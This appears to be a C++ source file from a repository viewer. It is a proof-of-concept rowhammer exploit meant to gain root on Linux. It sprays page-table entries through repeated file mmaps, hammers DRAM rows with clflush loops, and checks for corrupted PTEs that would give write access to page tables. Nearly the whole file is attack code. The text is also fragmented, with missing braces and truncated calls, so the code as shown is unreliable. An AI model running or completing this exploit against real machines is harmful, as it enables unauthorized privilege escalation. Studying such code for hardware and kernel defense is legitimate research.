blob: c3d94f3d6749e8e9ed84d3befbc710ddc53fcf71 [file] [log] [blame]
* An attempt at escalating privileges under Linux systems whose RAM is
* vulnerable to row hammering.
* Work by and
* We can probabilistically flip random bits in physical memory in memory rows
* "close" to the rows we are hammering. In order to exploit this, we wish to
* have a (physical) memory layout that looks roughly like this:
* [Physical pages used by the kernel as PTEs for a mapping we have access to]
* [Physical page that gets hammered]
* [Physical pages used by the kernel as PTEs for a mapping we have access to]
* [Physical page that gets hammered]
* (...)
* We wish to reach a point where a high fraction of physical memory is filled
* with this pattern. When we cause a bit-flip in a physical page adjacent to
* one we are hammering, we are corrupting a PTE for a page that is mapped into
* our virtual address space.
* If we succeed in corrupting one of the bits for indexing into the physical
* pages, we have a high probability that we will now have a RW mapping of a
* part of our processes page table; this should allow us full privilege
* escalation.
* In order to obtain the desired layout in physical memory, we perform the
* following actions:
* (1) Reserve a 1GB chunk for hammering, but do not allocate it yet.
* (2) mmap() a file repeatedly into our address space to force the OS to create
* PTEs. For each 512m we map, we get 1m of PTEs.
* (3) Touch the first/next page from the 1GB chunk.
* (4) Repeat steps (2) and (3) until physical memory is full.
* (5) Start row-hammering the 1GB area for a while.
* (6) Iterate over all mappings created in step (2), and check whether they map
* to the correct page.
* (7) If they do, we have lost. Goto (5).
* (8) If they don't, we have won.
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/sysinfo.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
// Abort the attack after a given number of attempts at inducing bit flips.
const uint32_t maximum_tries = 1024;
const size_t hammer_workspace_size = 1ULL << 32;
const int toggles = 540000;
const uint64_t size_of_pte_sprays = 1ULL << 22;
const uint64_t size_of_hammer_targets = 1ULL << 20;
const char* mapped_filename = "./mapped_file.bin";
// Reserve, but do not map, a range of addresses of a given size.
uint8_t* reserve_address_space(uint64_t size) {
uint8_t* mapping = (uint8_t*)mmap(NULL, size, PROT_NONE,
if (mapping == (void*)-1) {
printf("[E] Failed to reserve %lx of address space, exiting\n", size);
return mapping;
// Spray PTEs into kernel space by repeatedly mapping the same file into a
// given pre-reserved area of memory.
// Returns the "end" of the mappings, e.g. the first address past the last file
// mapping that was created during the PTE spray.
uint8_t* spray_pte(
uint8_t* address, uint64_t size_of_pte_spray, int file_descriptor,
uint64_t file_size) {
uint64_t size_of_sprayed_ptes = 0;
while (size_of_sprayed_ptes < size_of_pte_spray) {
void* mapping = mmap(address, file_size, PROT_READ | PROT_WRITE,
MAP_POPULATE | MAP_SHARED | MAP_FIXED, file_descriptor, 0);
size_of_sprayed_ptes += file_size / 512;
address += file_size + (file_size % 0x1000); // Round up to next page size.
if (mapping == (void*)-1) {
printf("[E] Failed to spray PTE's (%s).\n", strerror(errno));
return address;
// Create and write the file that will be mapped later.
void create_and_write_file_to_be_mapped() {
FILE* mapfile = fopen(mapped_filename, "wb");
char pagedata[0x1000];
uint16_t* start_page = (uint16_t*)&pagedata[0];
memset(pagedata, 'X', sizeof(pagedata));
for (uint32_t i = 0; i <= 0xFFFF; ++i) {
start_page[0] = (uint16_t)i;
fwrite(pagedata, sizeof(pagedata), sizeof(char), mapfile);
// Obtain the size of the physical memory of the system.
uint64_t get_physical_memory_size() {
struct sysinfo info;
sysinfo( &info );
return (size_t)info.totalram * (size_t)info.mem_unit;
// Pick a random page in the memory region.
uint8_t* pick_addr(uint8_t* area_base, uint64_t mem_size) {
size_t offset = (rand() << 12) % mem_size;
return area_base + offset;
// Helper class to show timing information during the hammering.
class Timer {
struct timespec start_time_;
Timer() {
int rc = clock_gettime(CLOCK_MONOTONIC, &start_time_);
assert(rc == 0);
double get_diff() {
struct timespec end_time;
int rc = clock_gettime(CLOCK_MONOTONIC, &end_time);
assert(rc == 0);
return (end_time.tv_sec - start_time_.tv_sec
+ (double) (end_time.tv_nsec - start_time_.tv_nsec) / 1e9);
void print_iters(uint64_t iterations) {
double total_time = get_diff();
double iter_time = total_time / iterations;
printf(" %.3f nanosec per iteration: %g sec for %" PRIu64 " iterations\n",
iter_time * 1e9, total_time, iterations);
static void row_hammer(int iterations, int addr_count, uint8_t* area,
uint64_t size) {
Timer t;
for (int j = 0; j < iterations; j++) {
uint32_t num_addrs = addr_count;
volatile uint32_t *addrs[num_addrs];
for (int a = 0; a < addr_count; a++) {
addrs[a] = (uint32_t *) pick_addr(area, size);
uint32_t sum = 0;
for (int i = 0; i < toggles; i++) {
for (int a = 0; a < addr_count; a++)
sum += *addrs[a] + 1;
for (int a = 0; a < addr_count; a++)
asm volatile("clflush (%0)" : : "r" (addrs[a]) : "memory");
// Just some code to make sure the above summation is not optimized out.
if (sum != 0) {
printf("[!] Sum was %lx\n", (uint64_t)sum);
t.print_iters(iterations * addr_count * toggles);
void dump_page(uint8_t* data) {
for (int i = 0; i < 0x1000; ++i) {
if (i % 32 == 0) {
printf("%2.2x ", data[i]);
bool check_hammer_area_integrity(uint8_t *hammer_area, uint64_t max_size) {
bool no_corruption = true;
for (uint8_t* check = hammer_area;
check < hammer_area + max_size; ++check) {
if (*check != 0xFF) {
printf("[!] Found bitflip inside hammer workspace at %lx.\n",
no_corruption = false;
return no_corruption;
bool check_mapping_integrity(uint8_t* mapping, uint64_t max_size) {
bool first_page_ok =
(mapping[0] == 0) && (mapping[1] == 0) && (mapping[2] =='X');
bool all_pages_ok = true;
if (!first_page_ok) {
return false;
// Check for all following pages that the dwords at the beginning of the
// pages are in ascending order.
for (uint8_t* check_pointer = mapping + 0x1000;
check_pointer < mapping+max_size; check_pointer += 0x1000) {
uint16_t* previous_page = (uint16_t*)(check_pointer-0x1000);
uint16_t* current_page = (uint16_t*)check_pointer;
uint16_t previous_page_counter = previous_page[0];
uint16_t current_page_counter = current_page[0];
//printf("%u == %u ?\n", (uint16_t)(previous_page_counter+1),
// (uint16_t)current_page_counter);
if ((uint16_t)(previous_page_counter + 1) !=
(uint16_t)current_page_counter) {
printf("[!] Possible winning ticket found at %lx\n",
printf("[!] Expected page counter %x, got %x.",
(uint16_t)(previous_page_counter+1), (uint16_t)current_page_counter);
// Dump the hexadecimal contents of the page.
all_pages_ok = false;
return all_pages_ok;
uint64_t get_physical_address(uint64_t virtual_address) {
int fd = open("/proc/self/pagemap", O_RDONLY);
assert(fd >=0);
off_t pos = lseek(fd, (virtual_address / 0x1000) * 8, SEEK_SET);
assert(pos >= 0);
uint64_t value;
int got = read(fd, &value, 8);
assert(got == 8);
return ((value & ((1ULL << 54)-1)) * 0x1000) |
(virtual_address & 0xFFF);
void dump_physical_addresses(uint8_t* mapping, uint64_t max_size) {
for (uint8_t* begin = mapping; begin < mapping + max_size; begin += 0x1000) {
printf("[!] Virtual %lx -> Physical %lx\n", (uint64_t)begin,
int main(int argc, char**argv) {
// Reserve a massive (16 TB) area of address space for us to fill with file
// mappings of a file - the goal is to fill physical memory with PTEs.
uint8_t* file_map_workspace = reserve_address_space(1ULL << 44);
// Allocate, but do not yet populate a 1GB area of memory that we are going to
// hammer.
uint8_t* hammer_workspace = (uint8_t*) mmap(NULL, hammer_workspace_size,
printf("[!] Creating file to be mapped.\n");
// Obtain the physical memory size of the current system.
uint64_t physical_memory_size = get_physical_memory_size();
printf("[!] System has %ld bytes of physical memory\n", physical_memory_size);
// Open the file that we will repeatedly map to spray PTEs.
int mapped_file_descriptor = open(mapped_filename, O_RDWR);
struct stat st;
if (stat(mapped_filename, &st) != 0) {
printf("[E] Failed to stat %s, exiting.\n", mapped_filename);
uint64_t file_size = st.st_size;
// A rough estimate on how much physical memory has been sprayed.
uint64_t physical_memory_consumed = 0;
uint8_t* current_pointer_into_file_map_workspace = file_map_workspace;
uint8_t* current_pointer_into_hammer_workspace = hammer_workspace;
// Aim to spray into 90% of physical memory.
while (physical_memory_consumed <= (0.1 * (double)physical_memory_size)) {
// Spray a bunch of PTEs.
current_pointer_into_file_map_workspace =
spray_pte(current_pointer_into_file_map_workspace, size_of_pte_sprays,
mapped_file_descriptor, file_size);
// Was the PTE spraying successful?
if (current_pointer_into_file_map_workspace == (uint8_t*)-1) {
printf("[!] Failed to spray PTEs after having consumed %lx bytes.",
physical_memory_consumed += size_of_pte_sprays;
// Now touch a bunch of pages in the hammer workspace to have physical pages
// allocated for them.
for (uint64_t size_counter = 0; size_counter < size_of_hammer_targets;
size_counter += 0x1000) {
if ((current_pointer_into_hammer_workspace + size_counter) <
hammer_workspace + hammer_workspace_size) {
memset(current_pointer_into_hammer_workspace + size_counter, 0xFF,
current_pointer_into_hammer_workspace += size_of_hammer_targets;
physical_memory_consumed += size_of_hammer_targets;
printf("[!] Should have consumed ~%ld bytes of physical memory\n",
// All memory should be properly set up to be hammered. Check the integrity
// pre-hammering.
printf("[!] Finished creating physical memory layout.\n");
uint64_t hammer_area_size = current_pointer_into_hammer_workspace -
uint64_t mapping_area_size = current_pointer_into_file_map_workspace -
// Dump virtual addresses to the console so we can inspect where they end up
// in physical memory.
printf("[!] Hammer workspace is at %lx and of %" PRId64 ".\n",
(uint64_t)hammer_workspace, hammer_area_size);
printf("[!] File mappings are at %lx and of %" PRId64 " size.\n",
(uint64_t)file_map_workspace, mapping_area_size);
// Dump virtual-to-physical mapping for the hammer area and the file mapping.
printf("[!] Dumping physical addresses for hammer workspace.\n");
dump_physical_addresses(hammer_workspace, hammer_area_size);
printf("[!] Dumping physical addresses for file mapping.\n");
dump_physical_addresses(file_map_workspace, file_size);
printf("[!] Checking integrity of mapping prior to hammering ... ");
if (check_mapping_integrity(file_map_workspace, mapping_area_size)) {
} else {
printf("[!] Checking integrity of mapping workspace prior to hammering ... ");
if (check_hammer_area_integrity(hammer_workspace, hammer_area_size)) {
} else {
// Begin the actual hammering.
for (int tries = 0; tries < maximum_tries; ++tries) {
// Hammer memory.
printf("[!] About to hammer for a few minutes.\n");
row_hammer(3000, 4, hammer_workspace, current_pointer_into_hammer_workspace -
// Attempt to verify the integrity of the mapping.
printf("[!] Done hammering. Now checking mapping integrity.\n");
if (!check_mapping_integrity(file_map_workspace,
current_pointer_into_file_map_workspace-file_map_workspace)) {
} else {
printf("[!] No PTE entries modified\n");
printf("[!] Checking integrity of mapping workspace post-hammering ... ");
if (check_hammer_area_integrity(hammer_workspace,
current_pointer_into_hammer_workspace - hammer_workspace)) {
} else {